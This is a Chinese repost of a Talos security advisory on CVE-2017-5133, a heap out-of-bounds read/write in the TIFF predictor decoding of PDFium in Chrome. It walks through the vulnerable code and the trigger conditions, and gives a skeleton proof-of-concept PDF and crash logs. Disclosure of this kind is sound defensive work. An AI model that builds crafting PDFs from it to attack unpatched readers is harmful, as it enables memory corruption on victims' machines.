Google PDFium TIFF Image F

文章正文
发布时间:2017-10-29 01:08

CVE编号:

CVE-2017-5133

概要

由Chrome浏览器使用的包含60.0.3112.101的Pdfium的TIFF图像解码器功能中的堆漏洞存在一个读取/写入漏洞。特制的PDF文件可以在堆上触发逐个读写,导致内存损坏,可能的信息泄漏和潜在的代码执行。受害者需要在浏览器中打开恶意PDF,以触发此漏洞。

测试版本

Google Chrome 60.0.3112.101

产品网址

https://pdfium.googlesource.com

CVSSv3得分

7.5 – CVSS:3.0 / AV:N / AC:H / PR:N / UI:R / S:U / C:H / I:H / A:H

细节

Pdfium是由Google开发的开源PDF渲染器,广泛用于Chrome浏览器,在线服务以及其他独立应用程序。这个错误是在最新的git版本以及最新的铬地址清洁剂版本(asan-linux-release-498039)上进行的。

负责解码压缩TIFF图像流的代码中存在堆缓冲区溢出。在解析flate解码图像流的像素数据时,到达TIFF_PredictLine函数:

void TIFF\_PredictLine(uint8_t* dest_buf,
                   uint32_t row_size,
                   int BitsPerComponent,
                   int Colors,
                   int Columns) {

int BytesPerPixel = BitsPerComponent * Colors / 8;
 if (BitsPerComponent == 16) {
 for (uint32_t i = BytesPerPixel; i < row_size; i += 2) {
   uint16_t pixel =
       (dest_buf[i - BytesPerPixel] << 8) | dest_buf[i - BytesPerPixel + 1];
   pixel += (dest_buf[i] << 8) | dest_buf[i + 1];
   dest_buf[i] = pixel >> 8;
   dest_buf[i + 1] = (uint8_t)pixel;

在上述代码中,在for循环期间,dest_buffer里即使缓冲区的长度小于该长度,也始终会读取4个字节。这可能潜在地导致堆上的逐个读取,紧接着是逐个写入。为了实现错误代码并触发的脆弱状态,需要满足几个条件。在上一个函数中TIFF_Predictor,我们看到:

bool TIFF_Predictor(uint8_t*& data_buf,                  uint32_t& data_size,                  int Colors,                  int BitsPerComponent,                  int Columns) {int row_size = (Colors * BitsPerComponent * Columns + 7) / 8;                         [1]if (row_size == 0)  return false;const int row_count = (data_size + row_size - 1) / row_size;const int last_row_size = data_size % row_size;                                        [2]for (int row = 0; row < row_count; row++) {  uint8_t* scan_line = data_buf + row * row_size;  if ((row + 1) * row_size > (int)data_size) {    row_size = last_row_size;                                                        [3]  }  TIFF_PredictLine(scan_line, row_size, BitsPerComponent, Colors, Columns);        [4]}return true;

在[1],row_size被计算并且是8的倍数。在[2],计算最后一行的数据大小,因为输入数据可能没有row_size可用的字节数。当最后一行被使用时(如果下一行最终在数据大小之外)row_size设置为last_row_size[3]。在[4]中,TIFF_PredictLine使用计算的行大小last_row_size调用易受攻击的功能。如果我们正确排列缓冲区大小,这可能导致最后 row_size为3,其中Tiff_PredictLine实际从数据缓冲区读取/写入4个字节,导致逐个读/写。
触发此错误的示例PDF是:

%PDF-1.647 0 obj<</DecodeParms      <<        /Columns 2      /Colors 1              /BitsPerComponent 16              /Predictor 2>>      /Filter/FlateDecode      /W[0 0 0]>>stream...endstreamendobjstartxref 30%%EOF

上面的数据流内容只需要满足一个条件,也就是说,它必须解码为在前面提到的代码中在[2]的计算中导致3的长度。满足这些和一些前面提到的条件的最低长度为23的值Columns,Colors和未压缩的数据流长度可以调节,以控制缓冲区,字节访问和所有最终得到传递给其相应的值到我们提到的功能。根据底层分配器和其他变量,滥用此漏洞或内存覆盖的错误可能不可行,但可能会与其他漏洞组合,从而导致进一步的内存损坏。崩溃信息从当时的(asan-linux-release-498039)

Rendering PDF file poc_test.pdf.

=================================================================

==67198==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000003177 at pc 0x0000025b0826 bp 0x7fffffffcf70 sp 0x7fffffffcf68READ of size 1 at 0x603000003177 thread T0 #0 0x25b0825 in _ZN12_GLOBAL__N_116TIFF_PredictLineEPhjiii ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:478 #1 0x25b0825 in ?? ??:0 #2 0x25b2646 in TIFF_Predictor ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:504 #3 0x25b2646 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:805 #4 0x25b2646 in ?? ??:0 #5 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319 #6 0x2423440 in ?? ??:0 #7 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:? #8 0x24240a9 in ?? ??:0 #9 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45 #10 0x2412602 in ?? ??:0 #11 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085 #12 0x23faa1b in ?? ??:0 #13 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645 #14 0x23ed71a in ?? ??:0 #15 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248 #16 0x23eaf90 in ?? ??:0 #17 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288 #18 0x20f747b in ?? ??:0 #19 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629 #20 0x20f7734 in ?? ??:0 #21 0x4f64b0 in ZB12_GLOBAL__N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitslcEENS0_9allocatorlcEEEEPKcmRKNS_7Options ES8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406 #22 0x4f64b0 in ?? ??:0 #23 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624 #24 0x4f3b7f in ?? ??:0 #25 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291 #26 0x7ffff624e82f in ?? ??:0 0x603000003177 is located 0 bytes to the right of 23-byte region [0x603000003160,0x603000003177) allocated by thread T0 here: #0 0x4c48e3 in __interceptor_malloc ??:? #1 0x4c48e3 in ?? ??:0 #2 0x25b2106 in PartitionAllocGenericFlags ./out/Release/../../third_party/pdfium/third_party/base/allocator/partition_allocator/partition_alloc.h:787 #3 0x25b2106 in FX_SafeAlloc ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:46 #4 0x25b2106 in FX_AllocOrDie ./out/Release/../../third_party/pdfium/core/fxcrt/fx_memory.h:67 #5 0x25b2106 in FlateUncompress ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:556 #6 0x25b2106 in FlateOrLZWDecode ./out/Release/../../third_party/pdfium/core/fxcodec/codec/fx_codec_flate.cpp:794 #7 0x25b2106 in ?? ??:0 #8 0x2423440 in _Z24FPDFAPI_FlateOrLZWDecodebPKhjP15CPDF_DictionaryjPPhPj ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/fpdf_parser_decode.cpp:319 #9 0x2423440 in ?? ??:0 #10 0x24240a9 in _Z14PDF_DataDecodePKhjPK15CPDF_DictionaryjbPPhPjP14CFX_ByteStringPPS1_ crtstuff.c:? #11 0x24240a9 in ?? ??:0 #12 0x2412602 in _ZN14CPDF_StreamAcc11LoadAllDataEbjb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_stream_acc.cpp:45 #13 0x2412602 in ?? ??:0 #14 0x23faa1b in _ZN11CPDF_Parser14LoadCrossRefV5EPlb ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:1085 #15 0x23faa1b in ?? ??:0 #16 0x23ed71a in _ZN11CPDF_Parser17LoadAllCrossRefV5El ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:645 #17 0x23ed71a in ?? ??:0 #18 0x23eaf90 in _ZN11CPDF_Parser18StartParseInternalEP13CPDF_Document ./out/Release/../../third_party/pdfium/core/fpdfapi/parser/cpdf_parser.cpp:248 #19 0x23eaf90 in ?? ??:0 #20 0x20f747b in _ZN12_GLOBAL__N_116LoadDocumentImplERK13CFX_RetainPtrI22IFX_SeekableReadStreamEPKc ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:288 #21 0x20f747b in ?? ??:0 #22 0x20f7734 in FPDF_LoadCustomDocument ./out/Release/../../third_party/pdfium/fpdfsdk/fpdfview.cpp:629 #23 0x20f7734 in ?? ??:0 #24 0x4f64b0 in ZN12_GLOBAL_N_19RenderPdfERKNSt3__112basic_stringIcNS0_11char_traitsIcEENS0_9allocatorIcEEEEPKcmRKNS_7OptionsE S8_ ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1406 #25 0x4f64b0 in ?? ??:0 #26 0x4f3b7f in main ./out/Release/../../third_party/pdfium/samples/pdfium_test.cc:1624 #27 0x4f3b7f in ?? ??:0 #28 0x7ffff624e82f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/../csu/libc-start.c:291 #29 0x7ffff624e82f in ?? ??:0SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/user/pdfium/repo/asan-linux-release- 498039/pdfium_test+0x25b0825)Shadow bytes around the buggy address:0x0c067fff85d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff85e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff85f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff8600: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd0x0c067fff8610: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa=>0x0c067fff8620: fd fd fd fa fa fa fd fd fd fa fa fa 00 00[07]fa0x0c067fff8630: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff8640: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff8650: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff8660: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa0x0c067fff8670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes):Addressable: 00Partially addressable: 01 02 03 04 05 06 07Heap left redzone: faFreed heap region: fdStack left redzone: f1Stack mid redzone: f2Stack right redzone: f3Stack after return: f5Stack use after scope: f8Global redzone: f9Global init order: f6Poisoned by user: f7Container overflow: fcArray cookie: acIntra object redzone: bbASan internal: feLeft alloca redzone: caRight alloca redzone: cb==67198==ABORTING

   官方最新版本的Chrome在Windows上运行时启用了PageHeap(BugId的输出):

   BugId: OOBW[0x1FB]+0~1#b6d7 c40.313
Location: chrome.exe!verifier.dll!AVrfpDphCheckPageHeapBlock
Description: Page heap detected heap corruption at 0x8EA7FFB; at the end of a 507/0x1FB bytes heap block at 0x8EA7E00. This appears to be a classic
buffer-overrun vulnerability. The following byte values were written to the corrupted area: 22.
Version: chrome.exe: 60.0.3112.113 (x86)
verifier.dll: 6.1.7600.16385 (x86)
Security impact: Potentially highly exploitable security issue.
Integrity level: 0x2000 (Medium Integrity; this process appears to not be sandboxed!)
Arguments: ['--enable-experimental-accessibility-features', '--enable-experimental-canvas-features', '--enable-experimental-input-
view-features', '--
enable-experimental-web-platform-features', '--enable-logging=stderr', '--enable-usermedia-screen-capturing', '--enable-viewport', '--
enable-webgl-draft-
extensions', '--enable-webvr', '--expose-internals-for-testing', '--disable-popup-blocking', '--disable-prompt-on-repost', '--force-
renderer-
accessibility',
'--javascript-harmony', '--js-flags="--expose-gc"', '--no-sandbox', 'c:\\Users\\ea\\Desktop\\poc.pdf']
堆栈:
verifier.dll!VerifierStopMessage + 0x1F8 (this frame is irrelevant to this bug)
2.verifier.dll!AVrfpDphReportCorruptedBlock + 0x1C2 (this frame is irrelevant to this bug)
3.verifier.dll!AVrfpDphCheckPageHeapBlock + 0x161 (id: c40)
4.verifier.dll!AVrfpDphFindBusyMemory + 0xDA (id: 313)
5.verifier.dll!AVrfpDphFindBusyMemoryAndRemoveFromBusyList + 0x20
6.ntdll.dll!RtlpDebugPageHeapFree + ? (the exact offset is not known)
7.ntdll.dll!RtlDebugFreeHeap + 0x2F
8.ntdll.dll!RtlpFreeHeap + 0x5D
9.ntdll.dll!RtlFreeHeap + 0x142
10.kernel32.dll!HeapFree + 0x14
11.chrome_child.dll + 0x163239 (no function symbol available)
12.chrome_child.dll + 0x1852FAA (no function symbol available)
13.chrome_child.dll + 0x184DDD1 (no function symbol available)
14.chrome_child.dll + 0x1846493 (no function symbol available)
15.chrome_child.dll + 0x18488BD (no function symbol available)
16.chrome_child.dll + 0x18485B5 (no function symbol available)
17.chrome_child.dll + 0x1823308 (no function symbol available)
18.chrome_child.dll + 0x18175AB (no function symbol available)
19.chrome_child.dll + 0x181413D (no function symbol available)
20.chrome_child.dll + 0x181468D (no function symbol available)
21.chrome_child.dll + 0x181F15A (no function symbol available)
22.chrome_child.dll + 0x181E1AF (no function symbol available)
23.chrome_child.dll + 0x17CA70A (no function symbol available)
24.chrome_child.dll + 0x1437254 (no function symbol available)
25.chrome_child.dll + 0x143797E (no function symbol available)
26.chrome_child.dll + 0x16729C1 (no function symbol available)

Page heap output for heap block near 0x8EA7FFB
address 08ea7e00 found in
_DPH_HEAP_ROOT @ 4161000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
8712000: 8ea7e00 1fb - 8ea7000 2000
6ccf8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
77876206 ntdll!RtlDebugAllocateHeap+0x00000030
7783a127 ntdll!RtlpAllocateHeap+0x000000c4
77805950 ntdll!RtlAllocateHeap+0x0000023a
58de52c3 chrome_child!ovly_debug_event+0x0014dff3
5a357dd2 chrome_child!IsSandboxedProcess+0x003fb31f
5a3cf306 chrome_child!IsSandboxedProcess+0x00472853
5a379bca chrome_child!IsSandboxedProcess+0x0041d117
5a37a05d chrome_child!IsSandboxedProcess+0x0041d5aa
5a38311c chrome_child!IsSandboxedProcess+0x00426669
5a376b0e chrome_child!IsSandboxedProcess+0x0041a05b
5a376493 chrome_child!IsSandboxedProcess+0x004199e0
5a3788bd chrome_child!IsSandboxedProcess+0x0041be0a
5a3785b5 chrome_child!IsSandboxedProcess+0x0041bb02
5a353308 chrome_child!IsSandboxedProcess+0x003f6855
5a3475ab chrome_child!IsSandboxedProcess+0x003eaaf8
5a34413d chrome_child!IsSandboxedProcess+0x003e768a
5a34468d chrome_child!IsSandboxedProcess+0x003e7bda
5a34f15a chrome_child!IsSandboxedProcess+0x003f26a7
5a34e1af chrome_child!IsSandboxedProcess+0x003f16fc
5a2fa70a chrome_child!IsSandboxedProcess+0x0039dc57
59f67254 chrome_child!IsSandboxedProcess+0x0000a7a1
59f6797e chrome_child!IsSandboxedProcess+0x0000aecb
5a1a29c1 chrome_child!IsSandboxedProcess+0x00245f0e
5a1a2be2 chrome_child!IsSandboxedProcess+0x0024612f
5a17e7ea chrome_child!IsSandboxedProcess+0x00221d37
5a17e9fb chrome_child!IsSandboxedProcess+0x00221f48
58c33f7e chrome_child+0x00103f7e
58c31129 chrome_child+0x00101129
58c33bc4 chrome_child+0x00103bc4
58c996e8 chrome_child!ovly_debug_event+0x00002418
58f54b95 chrome_child!ChromeMain+0x0000b501                               时间线

2017-09-05 – 供应商披露
2017-10-19 – 公开发布

参考来源:https://www.talosintelligence.com/reports/TALOS-2017-0432

*本文作者:生如夏花,转载请注明来自 FreeBuf.COM

文章评论
—— 标签 ——
首页
评论
分享
Top